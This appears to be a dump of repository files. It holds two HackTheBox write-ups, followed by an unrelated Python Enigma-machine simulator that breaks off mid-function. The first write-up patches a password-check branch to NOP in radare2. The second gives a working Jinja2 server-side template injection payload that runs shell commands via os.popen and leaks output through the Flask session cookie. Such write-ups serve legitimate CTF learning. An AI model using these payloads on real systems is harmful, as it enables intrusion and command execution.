mov qword [var_8h], str.SuperSeKretKey ; 0x400a70 ; \"SuperSeKretKey\"\n│ 0x00400874 c645c041 mov byte [var_40h], 0x41 ; 'A' ; 65\n│ 0x00400878 c645c15d mov byte [var_3fh], 0x5d ; ']' ; 93\n│ 0x0040087c c645c24b mov byte [var_3eh], 0x4b ; 'K' ; 75\n│ 0x00400880 c645c372 mov byte [var_3dh], 0x72 ; 'r' ; 114\n│ 0x00400884 c645c43d mov byte [var_3ch], 0x3d ; '=' ; 61\n│ 0x00400888 c645c539 mov byte [var_3bh], 0x39 ; '9' ; 57\n│ 0x0040088c c645c66b mov byte [var_3ah], 0x6b ; 'k' ; 107\n│ 0x00400890 c645c730 mov byte [var_39h], 0x30 ; '0' ; 48\n│ 0x00400894 c645c83d mov byte [var_38h], 0x3d ; '=' ; 61\n│ 0x00400898 c645c930 mov byte [var_37h], 0x30 ; '0' ; 48\n│ 0x0040089c c645ca6f mov byte [var_36h], 0x6f ; 'o' ; 111\n│ 0x004008a0 c645cb30 mov byte [var_35h], 0x30 ; '0' ; 48\n│ 0x004008a4 c645cc3b mov byte [var_34h], 0x3b ; ';' ; 59\n│ 0x004008a8 c645cd6b mov byte [var_33h], 0x6b ; 'k' ; 107\n│ 0x004008ac c645ce31 mov byte [var_32h], 0x31 ; '1' ; 49\n│ 0x004008b0 c645cf3f mov byte [var_31h], 0x3f ; '?' ; 63\n│ 0x004008b4 c645d06b mov byte [var_30h], 0x6b ; 'k' ; 107\n│ 0x004008b8 c645d138 mov byte [var_2fh], 0x38 ; '8' ; 56\n│ 0x004008bc c645d231 mov byte [var_2eh], 0x31 ; '1' ; 49\n│ 0x004008c0 c645d374 mov byte [var_2dh], 0x74 ; 't' ; 116\n│ 0x004008c4 bf7f0a4000 mov edi, 0x400a7f ; const char *format\n│ 0x004008c9 b800000000 mov eax, 0\n│ 0x004008ce e82dfdffff call sym.imp.printf ; int printf(const char *format)\n│ 0x004008d3 488d45e0 lea rax, [var_20h]\n│ 0x004008d7 4889c6 mov rsi, rax\n│ 0x004008da bf820a4000 mov edi, str.20s ; 0x400a82 ; \"%20s\" ; const char *format\n│ 0x004008df b800000000 mov eax, 0\n│ 0x004008e4 e887fdffff call sym.imp.__isoc99_scanf ; int scanf(const char *format)\n│ 0x004008e9 488d45e0 lea rax, [var_20h]\n│ 0x004008ed 4889c6 mov rsi, rax\n│ 0x004008f0 bf870a4000 mov edi, str.s ; 0x400a87 ; \"[%s]\\n\" ; const char *format\n│ 0x004008f5 b800000000 mov eax, 0\n│ 0x004008fa e801fdffff call sym.imp.printf ; int printf(const char *format)\n│ 0x004008ff 488b55f8 mov rdx, qword [var_8h]\n│ 0x00400903 488d45e0 lea rax, [var_20h]\n│ 0x00400907 4889d6 mov rsi, rdx ; const char *s2\n│ 0x0040090a 4889c7 mov rdi, rax ; const char *s1\n│ 0x0040090d e81efdffff call sym.imp.strcmp ; int strcmp(const char *s1, const char *s2)\n│ 0x00400912 8945f4 mov dword [var_ch], eax\n│ 0x00400915 837df400 cmp dword [var_ch], 0\n│ ┌─< 0x00400919 740a je 0x400925\n│ │ 0x0040091b bf01000000 mov edi, 1 ; int status\n│ │ 0x00400920 e85bfdffff call sym.imp.exit ; void exit(int status)\n│ │ ; CODE XREF from main @ 0x400919\n│ └─> 0x00400925 bf8d0a4000 mov edi, 0x400a8d ; const char *format\n│ 0x0040092a b800000000 mov eax, 0\n│ 0x0040092f e8ccfcffff call sym.imp.printf ; int printf(const char *format)\n│ 0x00400934 488d45e0 lea rax, [var_20h]\n│ 0x00400938 4889c6 mov rsi, rax\n│ 0x0040093b bf820a4000 mov edi, str.20s ; 0x400a82 ; \"%20s\" ; const char *format\n│ 0x00400940 b800000000 mov eax, 0\n│ 0x00400945 e826fdffff call sym.imp.__isoc99_scanf ; int scanf(const char *format)\n│ 0x0040094a bf14000000 mov edi, 0x14 ; 20 ; size_t arg1\n│ 0x0040094f e839feffff call fcn.0040078d\n│ 0x00400954 4889c2 mov rdx, rax\n│ 0x00400957 488d45e0 lea rax, [var_20h]\n│ 0x0040095b 4889d6 mov rsi, rdx ; const char *s2\n│ 0x0040095e 4889c7 mov rdi, rax ; const char *s1\n│ 0x00400961 e8cafcffff call sym.imp.strcmp ; int strcmp(const char *s1, const char *s2)\n│ 0x00400966 85c0 test eax, eax\n│ ┌─< 0x00400968 750c jne 0x400976\n│ │ 0x0040096a 488d45c0 lea rax, [var_40h]\n│ │ 0x0040096e 4889c7 mov rdi, rax ; int64_t 
arg1\n│ │ 0x00400971 e802000000 call fcn.00400978\n│ │ ; CODE XREF from main @ 0x400968\n│ └─> 0x00400976 c9 leave\n└ 0x00400977 c3 ret\n```\n\nBetween addresses `0x0040086c` and `0x00400920`, some string manipulation is carried out; to be honest, I didn’t try to understand it in detail, because something else popped into my head.\n\nAt address `0x00400961`, the string comparison `strcmp` is performed between `*s1` and `*s2`.\n\nLet’s talk about the `0x00400968` memory address.\n\nRegister `eax` will contain the return code from `strcmp`, after the call. The `test eax, eax` is the same as `and eax, eax` (bitwise and), except that it doesn’t store the result in `eax`. So `eax` isn’t affected by the test, but the `zero-flag (ZF)` is.\n\nThe `test eax, eax` is what makes the `jne` work in the first place. Also, `jne` is the same as `jnz`, just as `je` is the same as `jz`. Both act based on the `ZF` value.\n\nThe `jne` branch will be taken if `ZF=0` and therefore whenever `strcmp` returns a non-zero value (strings not equal). Conversely, if `eax` contains zero upon return from `strcmp`, the jump via `jne` will not happen.\n\nTo summarize: `strcmp` compares the strings and sets `eax` to zero if the strings are `equal`. If they are not, the `jne` instruction takes us to address `0x00400976`, which is the function epilogue (`leave`).\n\n# Reopen in read-write\n```\n[0x0040085d]> oo+\n```\n# Change memory address focus\n\nWe want to edit the `jne` instruction, so let’s seek to its address.\n```\n[0x0040085d]> s 0x00400968\n```\n# ASM instruction modification\n\nThe easy way to bypass this `jne` is to overwrite it with `NOP` (`No OPeration`) instructions.\n```\n[0x00400968]> wx 9090\n[0x00400968]> wa nop\nWritten 1 byte(s) (nop) = wx 90\n```\nWe can see our new instruction by disassembling again (the disassembly below has been truncated).\n```\n[0x00400968]> pdf\n0x00400961 e8cafcffff call sym.imp.strcmp ; int strcmp(const char *s1, const char *s2)\n0x00400966 85c0 test eax, eax\n0x00400968 90 nop\n```\nThat’s all with `radare2`, we can leave.\n```\n[0x00400968]> q\n```\n# Execution\n```\n./impossible_password.bin\n* SuperSeKretKey\n[SuperSeKretKey]\n** plop\nHTB{+*+*+*+*+*+*+*+*+*+*+*+*}\n```\nAdapted from: [Adrien](https://illuad.fr/2020/07/16/writeup-htb-reversing-impossible-password.html)" }, { "alpha_fraction": 0.6403820514678955, "alphanum_fraction": 0.6479342579841614, "avg_line_length": 35.314517974853516, "blob_id": "75ce70bfecf398d5fc0dcc6f0c4fae89c59a687f", "content_id": "49e79c1788ec9f98cf3b999a606ae85527eec874", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4502, "license_type": "permissive", "max_line_length": 259, "num_lines": 124, "path": "/HackTheBox/challenges/web/baby-ninja-jinja/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# baby ninja jinja\n\nA form appears on the website. 
The input did not appear to be vulnerable to SQL injection or any other common attack.\n\nIf you view the source code of the page (`ctrl + u`), a hint is commented at the bottom of the page:\n```html\n</body>\n<!-- /debug -->\n</html>\n```\n\n> If we look at this path\n\n`/debug`:\n```python\nfrom flask import Flask, session, render_template, request, Response, render_template_string, g\nimport functools, sqlite3, os\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = os.urandom(120)\n\nacc_tmpl = '''{% extends 'index.html' %}\n{% block content %}\n<h3>baby_ninja joined, total number of rebels: reb_num<br>\n{% endblock %}\n'''\n\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = sqlite3.connect('/tmp/ninjas.db')\n db.isolation_level = None\n db.row_factory = sqlite3.Row\n db.text_factory = (lambda s: s.replace('{{', '').\n replace(\"'\", '&#x27;').\n replace('\"', '&quot;').\n replace('<', '&lt;').\n replace('>', '&gt;')\n )\n return db\n\ndef query_db(query, args=(), one=False):\n with app.app_context():\n cur = get_db().execute(query, args)\n rv = [dict((cur.description[idx][0], str(value)) \\\n for idx, value in enumerate(row)) for row in cur.fetchall()]\n return (rv[0] if rv else None) if one else rv\n\[email protected]_first_request\ndef init_db():\n with app.open_resource('schema.sql', mode='r') as f:\n get_db().cursor().executescript(f.read())\n\[email protected]_appcontext\ndef close_connection(exception):\n db = getattr(g, '_database', None)\n if db is not None: db.close()\n\ndef rite_of_passage(func):\n @functools.wraps(func)\n def born2pwn(*args, **kwargs):\n\n name = request.args.get('name', '')\n\n if name:\n query_db('INSERT INTO ninjas (name) VALUES ("%s")' % name)\n\n report = render_template_string(acc_tmpl.\n replace('baby_ninja', query_db('SELECT name FROM ninjas ORDER BY id DESC', one=True)['name']).\n replace('reb_num', query_db('SELECT COUNT(id) FROM ninjas', one=True).itervalues().next())\n )\n\n if session.get('leader'): \n return report\n\n return render_template('welcome.jinja2')\n return func(*args, **kwargs)\n return born2pwn\n\[email protected]('/')\n@rite_of_passage\ndef index():\n return render_template('index.html')\n\[email protected]('/debug')\ndef debug():\n return Response(open(__file__).read(), mimetype='text/plain')\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=1337, debug=True)\n```\n\n# SSTI\n\nThis code shows that the name entry is inserted into a backend database and then extracted again from it to replace the substring `baby_ninja` in the `acc_tmpl` string, which is then passed to the `render_template_string` function.\n\nThe string `acc_tmpl` contains template blocks, delimited by `{%` and the trailing `%}`. The challenge's name contains the word `Jinja`, which is a template language for Python.\n\nThe attack should consist of a `Server-Side Template Injection (SSTI)`. 
This is accomplished by inserting template blocks into our name parameter so that the template blocks are executed in the context of the backend server when rendering the template string.\n\n* SSTI attacks on Jinja & Python\n * [Jinja2 SSTI](https://hackmd.io/@Chivato/HyWsJ31dI#References)\n * [Jinja2 SSTI](https://realpython.com/primer-on-jinja-templating/)\n\nThe payload was built as follows (the `+` signs are URL-encoded spaces, and the extra query parameters feed the payload through `request.args`, which dodges the `{{`/quote filtering done in `text_factory`):\n```\n{%+if+session.update({request.args.se:request.application.__globals__.__builtins__.__import__(request.args.os).popen(request.args.command).read()})+==+1+%}{%+endif+%}&se=asdf&os=os&command=ls\n```\nThe result of the command is not displayed in the response; instead it is stored in the `session` cookie, so we must decode this cookie after every request:\n```bash\nflask-unsign --decode --cookie "eyJhc2RmIjp7IiBiIjoiWVhCd0xuQjVDbVpzWVdkZlVEVTBaV1FLYzJOb1pXMWhMbk54YkFwemRHRjBhV01LZEdWdGNHeGhkR1Z6Q2c9PSJ9fQ.YRQfrQ.HxMrG2AVH-UYqJ2LUUCVt8lEvDw"\n\n{'asdf': b'app.py\\nflag_P54ed\\nschema.sql\\nstatic\\ntemplates\\n'}\n```\nAs you can see above, the flag's filename is clear, so the next request is as follows:\n```\n{%+if+session.update({request.args.se:request.application.__globals__.__builtins__.__import__(request.args.os).popen(request.args.command).read()})+==+1+%}{%+endif+%}&se=asdf&os=os&command=cat flag_P54ed\n```\nDecoding the new session cookie in the same way reveals the flag:\n```\nflask-unsign --decode --cookie [COOKIE]\n{'asdf': b'HTB{b4by_ninj4s_****_***_******_**_******}\\n'}\n```" } ]
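The cookie decoding can also be scripted instead of using the `flask-unsign` CLI. A minimal sketch using only the standard library; the `' b'` handling matches how Flask's tagged JSON serializer stores `bytes` values (visible in the raw cookie captured above), which is why a second base64 decode is needed:

```python
import base64
import json
import zlib

def decode_flask_cookie(cookie):
    """Decode (without verifying) the payload of a Flask session cookie."""
    compressed = cookie.startswith('.')  # itsdangerous marks zlib-compressed payloads
    payload = cookie.lstrip('.').split('.')[0]
    payload += '=' * (-len(payload) % 4)  # restore the stripped base64 padding
    data = base64.urlsafe_b64decode(payload)
    if compressed:
        data = zlib.decompress(data)
    session = json.loads(data)
    # Flask's tagged JSON stores bytes values as {' b': '<base64>'},
    # e.g. {'asdf': {' b': 'YXBwLnB5...'}} in the cookie captured above.
    for key, value in list(session.items()):
        if isinstance(value, dict) and ' b' in value:
            session[key] = base64.b64decode(value[' b'])
    return session
```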
14
ethanjpark/enigma_python
https://github.com/ethanjpark/enigma_python
a8541d021cf38cb350d830e7780caa51cf49ffd4
54f156301f251fe04e6b45618c85b9f8f3158b4e
631407b595b8bd50dbaf4faa48d9513183073bf3
refs/heads/master
2020-08-26T20:47:02.448478
2019-10-28T17:16:35
2019-10-28T17:16:35
217,143,814
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.650191068649292, "alphanum_fraction": 0.6766917109489441, "avg_line_length": 30.44961166381836, "blob_id": "33cdb6fe15f790d8b40bed0906bffeda6aea7b44", "content_id": "7cec5474195337cabeec8bde78d47fb8c2d38faf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8113, "license_type": "no_license", "max_line_length": 195, "num_lines": 258, "path": "/src/input.py", "repo_name": "ethanjpark/enigma_python", "src_encoding": "UTF-8", "text": "\"\"\"\nThe main enigma encryption process code.\n\nUser will input 3 rotors (I,II,III,IV,V), the reflector (A,B,C),\nring settings (3 numbers between 1~26), rotor start positions (3 letters), \nand plugboard configuration (29, 30, 31)\n\nOnce this is done, then user will type in message which will then be encrypted or\ndecrypted depending on which flag was raised initially.\n\nOr can use preset configuration (from key list #649), 29th, 30th, or 31st,\nby specifying either 29, 30, or 31 after the flag. User still needs to specify\nrotor starting positions.\n\"\"\"\n\nfrom rotors import *\nfrom plugboard import *\nimport sys\nfrom enigma import enigma\n\n#holds the appropriate rotor dictionary (from rotors.py) and the notch locations\nleft_rotor = None\nleft_notch = None\nmid_rotor = None\nmid_notch = None\nright_rotor = None\nright_notch = None\n\nreflector = None #holds appropriate reflector dictionary (from rotors.py)\nplugboard = None #holds appropriate plugboard dictionary (from plugboard.py)\n\n#keeps track of rotor's current wiring state (which contact to which contact)\ncurr_left_rotor = {}\ncurr_mid_rotor = {}\ncurr_right_rotor = {}\n\n#reflector pin dict\nreflector_mapping = {}\n\n#starting pos\nright_starting_pos = None\nmid_starting_pos = None\nleft_starting_pos = None\n\n#alphabet-number matching\nalphabet_mapping = { 'A':1,'B':2,'C':3,'D':4,'E':5,'F':6,'G':7,'H':8,'I':9,'J':10,'K':11,'L':12,'M':13,'N':14,'O':15,'P':16,'Q':17,'R':18,'S':19,'T':20,'U':21,'V':22,'W':23,'X':24,'Y':25,'Z':26 }\nalphabet = ['','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\nr_alphabet = ['','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A']\n\n#helper function for creating the wiring mapping dictionary\ndef create_curr_rotor_wiring_dict(rotor,ringstellung,starting_pos):\n\tglobal alphabet, alphabet_mapping\n\twiring_dict = {}\n\t#create mapping between contacts for each connection.\n\t#calculationg is based on the ringstellung and the rotor starting position\n\tif(ringstellung<1 or ringstellung>26):\n\t\tsys.exit(\"Invalid ringstellung, please select a number between 1 and 26\")\n\tif(not starting_pos.isalpha()):\n\t\tsys.exit(\"Invalid rotor starting position, please select an alphabetic character\")\n\tfor i in range(1,27):\n\t\tcontact_out = alphabet_mapping[rotor[alphabet[i]]]\n\t\tcontact_in = i\n\t\t#apply ringstellung offset\n\t\tcontact_in += ringstellung-1\n\t\tcontact_out += ringstellung-1\n\t\t#keep contacts in range 1-26\n\t\tif(contact_in > 26):\n\t\t\tcontact_in -= 26\n\t\tif(contact_out > 26):\n\t\t\tcontact_out -= 26\n\t\t#apply rotor starting position offset\n\t\tcontact_in -= alphabet_mapping[starting_pos]-1\n\t\tcontact_out -= alphabet_mapping[starting_pos]-1\n\t\t#keep contacts in range 1-26\n\t\tif(contact_in < 1):\n\t\t\tcontact_in += 26\n\t\tif(contact_out < 1):\n\t\t\tcontact_out += 26\n\t\twiring_dict[contact_in] = contact_out\n\treturn wiring_dict\n\n#check 
for correct # of args depending on custom config (9) or preset (2)\nif(len(sys.argv)!=12 and len(sys.argv)!=6):\n\n\tprint(\"Incorrect usage. Please see below for examples.\\n\")\n\tprint(\"Custom configuration: python input.py I II III A 1 2 3 A B C 29\\n\")\n\tprint(\"Preset: python input.py 29 A A B C\")\n\tsys.exit()\n\nelse:\n\t#assign correct dictionaries and values to the global variables based on inputs\n\tif(len(sys.argv)==12): #custom configuration\n\t\t#left rotor\n\t\tif(sys.argv[1]=='I'):\n\t\t\tleft_rotor = rotorI\n\t\t\tleft_notch = notchI\n\t\telif(sys.argv[1]=='II'):\n\t\t\tleft_rotor = rotorII\n\t\t\tleft_notch = notchII\n\t\telif(sys.argv[1]=='III'):\n\t\t\tleft_rotor = rotorIII\n\t\t\tleft_notch = notchIII\n\t\telif(sys.argv[1]=='IV'):\n\t\t\tleft_rotor = rotorIV\n\t\t\tleft_notch = notchIV\n\t\telif(sys.argv[1]=='V'):\n\t\t\tleft_rotor = rotorV\n\t\t\tleft_notch = notchV\n\t\telse:\n\t\t\tsys.exit(\"Invalid rotor, exiting\")\n\t\tleft_starting_pos = sys.argv[8]\n\t\tcurr_left_rotor = create_curr_rotor_wiring_dict(left_rotor,int(sys.argv[5]),left_starting_pos)\n\n\t\t#middle rotor\n\t\tif(sys.argv[2]=='I'):\n\t\t\tmid_rotor = rotorI\n\t\t\tmid_notch = notchI\n\t\telif(sys.argv[2]=='II'):\n\t\t\tmid_rotor = rotorII\n\t\t\tmid_notch = notchII\n\t\telif(sys.argv[2]=='III'):\n\t\t\tmid_rotor = rotorIII\n\t\t\tmid_notch = notchIII\n\t\telif(sys.argv[2]=='IV'):\n\t\t\tmid_rotor = rotorIV\n\t\t\tmid_notch = notchIV\n\t\telif(sys.argv[2]=='V'):\n\t\t\tmid_rotor = rotorV\n\t\t\tmid_notch = notchV\n\t\telse:\n\t\t\tsys.exit(\"Invalid rotor, exiting\")\n\t\tmid_starting_pos = sys.argv[9]\n\t\tcurr_mid_rotor = create_curr_rotor_wiring_dict(mid_rotor,int(sys.argv[6]),mid_starting_pos)\n\n\t\t#right rotor\n\t\tif(sys.argv[3]=='I'):\n\t\t\tright_rotor = rotorI\n\t\t\tright_notch = notchI\n\t\telif(sys.argv[3]=='II'):\n\t\t\tright_rotor = rotorII\n\t\t\tright_notch = notchII\n\t\telif(sys.argv[3]=='III'):\n\t\t\tright_rotor = rotorIII\n\t\t\tright_notch = notchIII\n\t\telif(sys.argv[3]=='IV'):\n\t\t\tright_rotor = rotorIV\n\t\t\tright_notch = notchIV\n\t\telif(sys.argv[3]=='V'):\n\t\t\tright_rotor = rotorV\n\t\t\tright_notch = notchV\n\t\telse:\n\t\t\tsys.exit(\"Invalid rotor, exiting\")\n\t\tright_starting_pos = sys.argv[10]\n\t\tcurr_right_rotor = create_curr_rotor_wiring_dict(right_rotor,int(sys.argv[7]),right_starting_pos)\n\n\t\t#reflector\n\t\tif(sys.argv[4]=='A'):\n\t\t\treflector = reflectorA\n\t\telif(sys.argv[4]=='B'):\n\t\t\treflector = reflectorB\n\t\telif(sys.argv[4]=='C'):\n\t\t\treflector = reflectorC\n\t\telse:\n\t\t\tsys.exit(\"Invalid reflector, exiting\")\n\t\t#populate reflect contact mapping dictionary\n\t\tfor i in range(1,27):\n\t\t\tletter = r_alphabet[i]\n\t\t\tcontact_out = alphabet_mapping[reflector[letter]]-1\n\t\t\tif(contact_out==0): #A is now contact pin 26 and not 1\n\t\t\t\tcontact_out = 26\n\t\t\treflector_mapping[i] = contact_out\n\n\t\t#plugboard pairs\n\t\tif(sys.argv[11]=='29'):\n\t\t\tplugboard = plugboard29\n\t\telif(sys.argv[11]=='30'):\n\t\t\tplugboard = plugboard30\n\t\telif(sys.argv[11]=='31'):\n\t\t\tplugboard = plugboard31\n\t\telse:\n\t\t\tsys.exit(\"Invalid plugboard, exiting\")\n\n\t#preset\n\telse:\n\n\t\t#reflector\n\t\tif(sys.argv[2]=='A'):\n\t\t\treflector = reflectorA\n\t\telif(sys.argv[2]=='B'):\n\t\t\treflector = reflectorB\n\t\telif(sys.argv[2]=='C'):\n\t\t\treflector = reflectorC\n\t\telse:\n\t\t\tsys.exit(\"Invalid reflector, exiting\")\n\t\t#populate reflect contact mapping dictionary\n\t\tfor i in range(1,27):\n\t\t\tletter = 
r_alphabet[i]\n\t\t\tcontact_out = alphabet_mapping[reflector[letter]]-1\n\t\t\tif(contact_out==0): #A is now contact pin 26 and not 1\n\t\t\t\tcontact_out = 26\n\t\t\treflector_mapping[i] = contact_out\n\n\t\t# argv[2] is the reflector; the three starting positions follow it\n\t\tleft_starting_pos = sys.argv[3]\n\t\tmid_starting_pos = sys.argv[4]\n\t\tright_starting_pos = sys.argv[5]\n\n\t\tif(sys.argv[1]=='29'):\n\t\t\tleft_rotor = rotorIII\n\t\t\tleft_notch = notchIII\n\t\t\tmid_rotor = rotorII\n\t\t\tmid_notch = notchII\n\t\t\tright_rotor = rotorI\n\t\t\tright_notch = notchI\n\t\t\tcurr_left_rotor = create_curr_rotor_wiring_dict(left_rotor,12,left_starting_pos)\n\t\t\tcurr_mid_rotor = create_curr_rotor_wiring_dict(mid_rotor,24,mid_starting_pos)\n\t\t\tcurr_right_rotor = create_curr_rotor_wiring_dict(right_rotor,3,right_starting_pos)\n\t\t\tplugboard = plugboard29\n\t\telif(sys.argv[1]=='30'):\n\t\t\tleft_rotor = rotorIV\n\t\t\tleft_notch = notchIV\n\t\t\tmid_rotor = rotorIII\n\t\t\tmid_notch = notchIII\n\t\t\tright_rotor = rotorII\n\t\t\tright_notch = notchII\n\t\t\tcurr_left_rotor = create_curr_rotor_wiring_dict(left_rotor,5,left_starting_pos)\n\t\t\tcurr_mid_rotor = create_curr_rotor_wiring_dict(mid_rotor,26,mid_starting_pos)\n\t\t\tcurr_right_rotor = create_curr_rotor_wiring_dict(right_rotor,2,right_starting_pos)\n\t\t\tplugboard = plugboard30\n\t\telif(sys.argv[1]=='31'):\n\t\t\tleft_rotor = rotorI\n\t\t\tleft_notch = notchI\n\t\t\tmid_rotor = rotorV\n\t\t\tmid_notch = notchV\n\t\t\tright_rotor = rotorIII\n\t\t\tright_notch = notchIII\n\t\t\tcurr_left_rotor = create_curr_rotor_wiring_dict(left_rotor,14,left_starting_pos)\n\t\t\tcurr_mid_rotor = create_curr_rotor_wiring_dict(mid_rotor,9,mid_starting_pos)\n\t\t\tcurr_right_rotor = create_curr_rotor_wiring_dict(right_rotor,24,right_starting_pos)\n\t\t\tplugboard = plugboard31\n\t\telse:\n\t\t\tsys.exit(\"Invalid preset, exiting\")\n\n\tmsg = raw_input(\"Type in your message (Note, punctuation and spaces will not be encrypted): \")\n\tprint(\"\\n\\n\")\n\tprint(enigma(msg,\n\t\t\t\t curr_left_rotor,\n\t\t\t\t left_notch,\n\t\t\t\t left_starting_pos,\n\t\t\t\t curr_mid_rotor,\n\t\t\t\t mid_notch,\n\t\t\t\t mid_starting_pos,\n\t\t\t\t curr_right_rotor,\n\t\t\t\t right_notch,\n\t\t\t\t right_starting_pos,\n\t\t\t\t reflector_mapping,\n\t\t\t\t plugboard))\n\n\tsys.exit()" }, { "alpha_fraction": 0.7600423097610474, "alphanum_fraction": 0.7790697813034058, "avg_line_length": 35.42307662963867, "blob_id": "bb4bb2cf4d217d6384b87c4194a54af0da1f77c9", "content_id": "bd0586a5241b3f076072958e9d7d82ff2d1eee97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 946, "license_type": "no_license", "max_line_length": 109, "num_lines": 26, "path": "/README.md", "repo_name": "ethanjpark/enigma_python", "src_encoding": "UTF-8", "text": "# enigma_python\n\nRotor and reflector wirings to be chosen from rotor wiring tables here:\nhttps://en.wikipedia.org/wiki/Enigma_rotor_details\n\n3-rotor configurations and plugboard configurations from here:\nhttps://en.wikipedia.org/wiki/Enigma_machine#/media/File:Enigma_keylist_3_rotor.jpg\n\nRing setting (ringstellung) and rotor starting position explained here: (easy to confuse them)\nhttp://users.telenet.be/d.rijmenants/en/enigmatech.htm\n\nUsage:\n`python input.py I II III A 1 2 3 A B C 29`\n\n`python input.py 29 A A B C`\n\n\n### File Breakdown\n\nenigma.py - the actual polyalphabetic substitution algorithm used by enigma. 
Algorithm is called by input.py\n\ninput.py - command line input argument processing and calling of the algorithm\n\nplugboard.py - Contains the plugboard pairings for the 29th, 30th, and 31st from keylist #649 from link above\n\nrotors.py - Contains the rotor wiring dictionaries for rotors I, II, III, IV, V and reflectors A, B, C" }, { "alpha_fraction": 0.6310621500015259, "alphanum_fraction": 0.6456913948059082, "avg_line_length": 35.42335891723633, "blob_id": "bc4f9189e70d4e3f61627b2a347afe8c4c1c840b", "content_id": "940f6084e8d2804073020d356e44e849eeb87390", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4990, "license_type": "no_license", "max_line_length": 141, "num_lines": 137, "path": "/src/enigma.py", "repo_name": "ethanjpark/enigma_python", "src_encoding": "UTF-8", "text": "#actual encryption algorithm stuff here\n\"\"\"\nat the very rudimentary level, the algorithm goes like this:\n\ninput -> plugboard -> right rotor -> mid rotor -> left rotor -> reflector -> left rotor -> mid rotor -> right rotor -> plugboard -> output\n\"\"\"\n\n#stepping a rotor, input is the wiring dict for a particular rotor\ndef step_rotor(rotor):\n\tnew_dict = {}\n\t#rotor is turning towards the operator, so decrement the pin number\n\tfor contact_in in rotor:\n\t\tnew_in = contact_in-1\n\t\tnew_out = rotor[contact_in]-1\n\t\tif(new_in < 1):\n\t\t\tnew_in = 26\n\t\tif(new_out < 1):\n\t\t\tnew_out = 26\n\t\tnew_dict[new_in] = new_out\n\treturn new_dict\n\n#pass in the wiring dictionaries populated in input.py\ndef enigma(msg,lr,lnotch,lstart,mr,mnotch,mstart,rr,rnotch,rstart,reflector,plugboard):\n\toutput_str = ''\n\tupp_msg = msg.upper()\n\tleft_rotor = lr\n\tmid_rotor = mr\n\tright_rotor = rr\n\tfor char in upp_msg:\n\t\t#don't encrypt any non alphabetic characters\n\t\tif(not char.isalpha()):\n\t\t\toutput_str = output_str + char\n\n\t\telse:\n\t\t\talphabet = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n\t\t\t#maps alphabet to the entry wheel pins basically\n\t\t\tentry_mapping = { 'A':1,'B':2,'C':3,'D':4,'E':5,'F':6,'G':7,'H':8,'I':9,'J':10,'K':11,'L':12,'M':13,'N':14,'O':15,\n\t\t\t\t\t\t\t\t 'P':16,'Q':17,'R':18,'S':19,'T':20,'U':21,'V':22,'W':23,'X':24,'Y':25,'Z':26 }\n\t\t\toutput_char = char\n\t\t\tcurr_char_left = alphabet.index(lstart)\n\t\t\tcurr_char_mid = alphabet.index(mstart)\n\t\t\tcurr_char_right = alphabet.index(rstart) \n\t\t\tstep_mid = False\n\t\t\tstep_left = False\n\n\t\t\t##### 1. PLUGBOARD ######\n\t\t\t# print(\"step 1\")\n\t\t\t#if character needs to be swapped per plugboard\n\t\t\tif(output_char in plugboard): #char in keys\n\t\t\t\toutput_char = plugboard[output_char]\n\t\t\telif(output_char in plugboard.values()): #char in values\n\t\t\t\tfor key_char in plugboard:\n\t\t\t\t\tif(plugboard[key_char] == output_char):\n\t\t\t\t\t\toutput_char = key_char\n\t\t\t\t\t\tbreak\n\n\t\t\t##### 2. 
Stepping the rotors #####\n\t\t\t# print(\"step 2\")\n\t\t\tif(alphabet[curr_char_mid] == mnotch):\n\t\t\t\tstep_left = True\n\t\t\tif(alphabet[curr_char_right] == rnotch):\n\t\t\t\tstep_mid = True\n\n\t\t\tif(step_left):\n\t\t\t\tleft_rotor = step_rotor(left_rotor)\n\t\t\t\tcurr_char_left = (curr_char_left+1) % len(alphabet) #update rotor position (character that would show on top on an actual enigma machine)\n\t\t\t\tmid_rotor = step_rotor(mid_rotor) #mid rotor also steps because of the double stepping phenomena\n\t\t\t\tcurr_char_mid = (curr_char_mid+1) % len(alphabet) #update rotor position\n\t\t\t\tstep_left = False\n\t\t\t\tstep_mid = False #I haven't encountered this in all of the material that I've read so far about the enigma, but\n\t\t\t\t\t\t\t\t #basically the case where both the mid and right rotors are in their notch positions. If my logic\n\t\t\t\t\t\t\t\t #is correct, this can only happen if the starting positions of the rotors are set to the notch\n\t\t\t\t\t\t\t\t #positions intentionally.\n\t\t\tif(step_mid):\n\t\t\t\tmid_rotor = step_rotor(mid_rotor)\n\t\t\t\tcurr_char_mid = (curr_char_mid+1) % len(alphabet) #update rotor position\n\t\t\t\tstep_mid = False\n\t\t\tright_rotor = step_rotor(right_rotor) #right rotor steps with every keystroke\n\t\t\tcurr_char_right = (curr_char_right+1) % len(alphabet) #update rotor position\n \n\t\t\t##### 3. Rotors #####\n\t\t\t# print(\"step 3\")\n\t\t\tentry_out = entry_mapping[output_char]\n\t\t\tright_out = right_rotor[entry_out] #right rotor substitution\n\t\t\tmid_out = mid_rotor[right_out] #mid rotor substitution\n\t\t\tleft_out = left_rotor[mid_out] #left rotor substitution\n\n\t\t\t##### 4. Reflector #####\n\t\t\t# print(\"step 4\")\n\t\t\tref_out = reflector[left_out]\n\n\t\t\t##### 5. Rotors (again) #####\n\t\t\t# print(\"step 5\")\n\t\t\t#going backwards through the rotors, and since the rotor wiring dictionaries are one-directional,\n\t\t\t#have to go through the connections and find the input contact that connects to the output contact\n\t\t\t#that we got from the reflector\n\t\t\tmid_in = 0\n\t\t\twhile(mid_in == 0): #finding pin to mid rotor\n\t\t\t\tfor pin_in in left_rotor:\n\t\t\t\t\tif(left_rotor[pin_in] == ref_out):\n\t\t\t\t\t\tmid_in = 